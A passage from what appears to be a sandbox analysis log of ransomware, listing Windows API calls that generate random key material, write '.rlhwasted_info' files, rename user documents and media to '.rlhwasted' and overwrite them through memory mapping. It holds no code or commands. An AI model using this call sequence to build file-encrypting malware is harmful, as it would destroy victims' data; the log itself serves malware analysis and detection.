hFile=0x104, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0187.360] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef298 | out: hHeap=0x6b0000) returned 1 [0187.360] lstrcpyW (in: lpString1=0x6d461e, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0187.360] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NGag\\77RatKR0_u1G\\ETKxA\\pyMW0 oMh.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ngag\\77ratkr0_u1g\\etkxa\\pymw0 omh.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NGag\\77RatKR0_u1G\\ETKxA\\pyMW0 oMh.png.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ngag\\77ratkr0_u1g\\etkxa\\pymw0 omh.png.rlhwasted")) returned 1 [0187.361] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NGag\\77RatKR0_u1G\\ETKxA\\pyMW0 oMh.png.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ngag\\77ratkr0_u1g\\etkxa\\pymw0 omh.png.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0187.361] CreateFileMappingW (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x128 [0187.361] GetFileSize (in: hFile=0x110, lpFileSizeHigh=0x12afe94 | out: lpFileSizeHigh=0x12afe94*=0x0) returned 0x122a5 [0187.361] MapViewOfFile (hFileMappingObject=0x128, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x122a5) returned 0xb00000 [0187.361] CloseHandle (hObject=0x110) returned 1 [0187.366] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x6f6f10) returned 1 [0187.367] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x1b8, pbBuffer=0x704798 | out: pbBuffer=0x704798) returned 1 [0187.367] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0187.367] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x6f6f10) returned 1 [0187.368] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0187.368] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0187.377] SetEndOfFile (hFile=0x104) returned 1 [0187.380] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef298 | out: hHeap=0x6b0000) returned 1 [0187.380] CloseHandle (hObject=0x104) returned 1 [0187.398] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d4580 | out: hHeap=0x6b0000) returned 1 [0187.398] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6fca00 | out: hHeap=0x6b0000) returned 1 [0187.398] _aulldvrm () returned 0x0 [0187.398] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x6f6f10) returned 1 [0187.399] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0187.399] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0187.399] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NGag\\77RatKR0_u1G\\of7GOP94Xob_8yI97g\\2bZi.pdf") returned 87 [0187.399] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2b8) returned 0x6d4580 [0187.399] lstrcpyW (in: lpString1=0x6d462e, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0187.399] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6ef298 [0187.399] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x6f6f10) returned 1 [0187.400] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0xa34, pbBuffer=0x6ef298 | out: pbBuffer=0x6ef298) returned 1 [0187.400] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0187.400] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NGag\\77RatKR0_u1G\\of7GOP94Xob_8yI97g\\2bZi.pdf.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ngag\\77ratkr0_u1g\\of7gop94xob_8yi97g\\2bzi.pdf.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0187.401] WriteFile (in: hFile=0x104, lpBuffer=0x6ef298*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x6ef298*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0187.402] SetEndOfFile (hFile=0x104) returned 1 [0187.402] SetFilePointer (in: hFile=0x104, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0187.402] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef298 | out: hHeap=0x6b0000) returned 1 [0187.402] lstrcpyW (in: lpString1=0x6d462e, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0187.402] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NGag\\77RatKR0_u1G\\of7GOP94Xob_8yI97g\\2bZi.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ngag\\77ratkr0_u1g\\of7gop94xob_8yi97g\\2bzi.pdf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NGag\\77RatKR0_u1G\\of7GOP94Xob_8yI97g\\2bZi.pdf.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ngag\\77ratkr0_u1g\\of7gop94xob_8yi97g\\2bzi.pdf.rlhwasted")) returned 1 [0187.403] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NGag\\77RatKR0_u1G\\of7GOP94Xob_8yI97g\\2bZi.pdf.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ngag\\77ratkr0_u1g\\of7gop94xob_8yi97g\\2bzi.pdf.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0187.403] CreateFileMappingW (hFile=0x128, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x10c [0187.403] GetFileSize (in: hFile=0x128, lpFileSizeHigh=0x12afe94 | out: lpFileSizeHigh=0x12afe94*=0x0) returned 0xec11 [0187.403] MapViewOfFile (hFileMappingObject=0x10c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xec11) returned 0x6a0000 [0187.403] CloseHandle (hObject=0x128) returned 1 [0187.407] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x6f6f10) returned 1 [0187.408] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x1b8, pbBuffer=0x6e7b28 | out: pbBuffer=0x6e7b28) returned 1 [0187.408] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0187.408] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x6f6f10) returned 1 [0187.409] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0187.409] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0187.419] SetEndOfFile (hFile=0x104) returned 1 [0187.421] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef298 | out: hHeap=0x6b0000) returned 1 [0187.421] CloseHandle (hObject=0x104) returned 1 [0187.425] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d4580 | out: hHeap=0x6b0000) returned 1 [0187.425] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6fdb00 | out: hHeap=0x6b0000) returned 1 [0187.425] _aulldvrm () returned 0x0 [0187.425] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x6f6f10) returned 1 [0187.426] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0187.426] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0187.426] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NGag\\77RatKR0_u1G\\of7GOP94Xob_8yI97g\\5MdSiH.bmp") returned 89 [0187.426] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2bc) returned 0x6d4580 [0187.426] lstrcpyW (in: lpString1=0x6d4632, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0187.426] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6ef298 [0187.426] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x6f6f10) returned 1 [0187.427] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0xa34, pbBuffer=0x6ef298 | out: pbBuffer=0x6ef298) returned 1 [0187.427] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0187.427] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NGag\\77RatKR0_u1G\\of7GOP94Xob_8yI97g\\5MdSiH.bmp.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ngag\\77ratkr0_u1g\\of7gop94xob_8yi97g\\5mdsih.bmp.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0187.475] WriteFile (in: hFile=0x124, lpBuffer=0x6ef298*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x6ef298*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0187.476] SetEndOfFile (hFile=0x124) returned 1 [0187.476] SetFilePointer (in: hFile=0x124, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0187.476] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef298 | out: hHeap=0x6b0000) returned 1 [0187.476] lstrcpyW (in: lpString1=0x6d4632, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0187.476] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NGag\\77RatKR0_u1G\\of7GOP94Xob_8yI97g\\5MdSiH.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ngag\\77ratkr0_u1g\\of7gop94xob_8yi97g\\5mdsih.bmp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NGag\\77RatKR0_u1G\\of7GOP94Xob_8yI97g\\5MdSiH.bmp.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ngag\\77ratkr0_u1g\\of7gop94xob_8yi97g\\5mdsih.bmp.rlhwasted")) returned 1 [0187.477] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NGag\\77RatKR0_u1G\\of7GOP94Xob_8yI97g\\5MdSiH.bmp.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ngag\\77ratkr0_u1g\\of7gop94xob_8yi97g\\5mdsih.bmp.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0187.477] CreateFileMappingW (hFile=0x104, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x110 [0187.477] GetFileSize (in: hFile=0x104, lpFileSizeHigh=0x12afe94 | out: lpFileSizeHigh=0x12afe94*=0x0) returned 0xc9cc [0187.477] MapViewOfFile (hFileMappingObject=0x110, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xc9cc) returned 0x6a0000 [0187.478] CloseHandle (hObject=0x104) returned 1 [0187.483] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x710fe8) returned 1 [0187.484] CryptGenRandom (in: hProv=0x710fe8, dwLen=0x1b8, pbBuffer=0x704798 | out: pbBuffer=0x704798) returned 1 [0187.484] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0187.484] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x6f6f10) returned 1 [0187.484] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0187.484] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0187.523] SetEndOfFile (hFile=0x124) returned 1 [0187.969] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ec7b8 | out: hHeap=0x6b0000) returned 1 [0187.969] CloseHandle (hObject=0x124) returned 1 [0187.971] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d4580 | out: hHeap=0x6b0000) returned 1 [0187.971] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6fdc08 | out: hHeap=0x6b0000) returned 1 [0187.972] _aulldvrm () returned 0x0 [0187.972] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x6f6f10) returned 1 [0187.973] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0187.973] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0187.973] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NGag\\77RatKR0_u1G\\of7GOP94Xob_8yI97g\\_yxppVrB.mp3") returned 91 [0187.973] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2c0) returned 0x6d4580 [0187.973] lstrcpyW (in: lpString1=0x6d4636, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0187.973] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6ec7b8 [0187.973] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x6f6f10) returned 1 [0187.974] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0xa34, pbBuffer=0x6ec7b8 | out: pbBuffer=0x6ec7b8) returned 1 [0187.974] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0187.974] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NGag\\77RatKR0_u1G\\of7GOP94Xob_8yI97g\\_yxppVrB.mp3.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ngag\\77ratkr0_u1g\\of7gop94xob_8yi97g\\_yxppvrb.mp3.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0187.975] WriteFile (in: hFile=0x124, lpBuffer=0x6ec7b8*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x6ec7b8*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0187.976] SetEndOfFile (hFile=0x124) returned 1 [0187.976] SetFilePointer (in: hFile=0x124, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0187.976] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ec7b8 | out: hHeap=0x6b0000) returned 1 [0187.976] lstrcpyW (in: lpString1=0x6d4636, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0187.976] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NGag\\77RatKR0_u1G\\of7GOP94Xob_8yI97g\\_yxppVrB.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ngag\\77ratkr0_u1g\\of7gop94xob_8yi97g\\_yxppvrb.mp3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NGag\\77RatKR0_u1G\\of7GOP94Xob_8yI97g\\_yxppVrB.mp3.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ngag\\77ratkr0_u1g\\of7gop94xob_8yi97g\\_yxppvrb.mp3.rlhwasted")) returned 1 [0187.977] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NGag\\77RatKR0_u1G\\of7GOP94Xob_8yI97g\\_yxppVrB.mp3.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ngag\\77ratkr0_u1g\\of7gop94xob_8yi97g\\_yxppvrb.mp3.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0187.977] CreateFileMappingW (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x104 [0187.977] GetFileSize (in: hFile=0x110, lpFileSizeHigh=0x12afe94 | out: lpFileSizeHigh=0x12afe94*=0x0) returned 0xc3b3 [0187.977] MapViewOfFile (hFileMappingObject=0x104, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xc3b3) returned 0x6a0000 [0187.978] CloseHandle (hObject=0x110) returned 1 [0187.982] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x6f6f10) returned 1 [0187.983] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x1b8, pbBuffer=0x704798 | out: pbBuffer=0x704798) returned 1 [0187.984] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0187.984] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x6f6f10) returned 1 [0187.984] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0187.985] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0187.994] SetEndOfFile (hFile=0x124) returned 1 [0187.997] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ec7b8 | out: hHeap=0x6b0000) returned 1 [0187.997] CloseHandle (hObject=0x124) returned 1 [0188.023] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d4580 | out: hHeap=0x6b0000) returned 1 [0188.023] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6fba30 | out: hHeap=0x6b0000) returned 1 [0188.023] _aulldvrm () returned 0x0 [0188.023] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x6f6f10) returned 1 [0188.024] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0188.024] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0188.024] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NGag\\77RatKR0_u1G\\vU451.m4a") returned 69 [0188.024] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x294) returned 0x6d4580 [0188.024] lstrcpyW (in: lpString1=0x6d460a, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0188.024] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6ef298 [0188.024] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x6f6f10) returned 1 [0188.025] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0xa34, pbBuffer=0x6ef298 | out: pbBuffer=0x6ef298) returned 1 [0188.025] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0188.025] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NGag\\77RatKR0_u1G\\vU451.m4a.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ngag\\77ratkr0_u1g\\vu451.m4a.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0188.026] WriteFile (in: hFile=0x124, lpBuffer=0x6ef298*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x6ef298*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0188.027] SetEndOfFile (hFile=0x124) returned 1 [0188.027] SetFilePointer (in: hFile=0x124, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0188.027] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef298 | out: hHeap=0x6b0000) returned 1 [0188.027] lstrcpyW (in: lpString1=0x6d460a, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0188.027] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NGag\\77RatKR0_u1G\\vU451.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ngag\\77ratkr0_u1g\\vu451.m4a"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NGag\\77RatKR0_u1G\\vU451.m4a.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ngag\\77ratkr0_u1g\\vu451.m4a.rlhwasted")) returned 1 [0188.028] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NGag\\77RatKR0_u1G\\vU451.m4a.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ngag\\77ratkr0_u1g\\vu451.m4a.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x10c [0188.028] CreateFileMappingW (hFile=0x10c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x110 [0188.028] GetFileSize (in: hFile=0x10c, lpFileSizeHigh=0x12afe94 | out: lpFileSizeHigh=0x12afe94*=0x0) returned 0x11afc [0188.028] MapViewOfFile (hFileMappingObject=0x110, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x11afc) returned 0xb00000 [0188.029] CloseHandle (hObject=0x10c) returned 1 [0188.033] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x6f6f10) returned 1 [0188.034] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x1b8, pbBuffer=0x6e7b28 | out: pbBuffer=0x6e7b28) returned 1 [0188.034] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0188.035] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x6f6f10) returned 1 [0188.035] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0188.035] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0188.045] SetEndOfFile (hFile=0x124) returned 1 [0188.048] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef298 | out: hHeap=0x6b0000) returned 1 [0188.048] CloseHandle (hObject=0x124) returned 1 [0188.051] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d4580 | out: hHeap=0x6b0000) returned 1 [0188.051] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6fb598 | out: hHeap=0x6b0000) returned 1 [0188.051] _aulldvrm () returned 0x0 [0188.051] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x6f6f10) returned 1 [0188.053] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0188.053] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0188.053] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NGag\\77RatKR0_u1G\\ZvbZ-6N7DseFJny.pptx") returned 80 [0188.053] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2aa) returned 0x70cfe8 [0188.053] lstrcpyW (in: lpString1=0x70d088, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0188.053] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6ef298 [0188.053] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x6f6f10) returned 1 [0188.054] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0xa34, pbBuffer=0x6ef298 | out: pbBuffer=0x6ef298) returned 1 [0188.054] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0188.054] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NGag\\77RatKR0_u1G\\ZvbZ-6N7DseFJny.pptx.rlhwasted_info" (normalized: 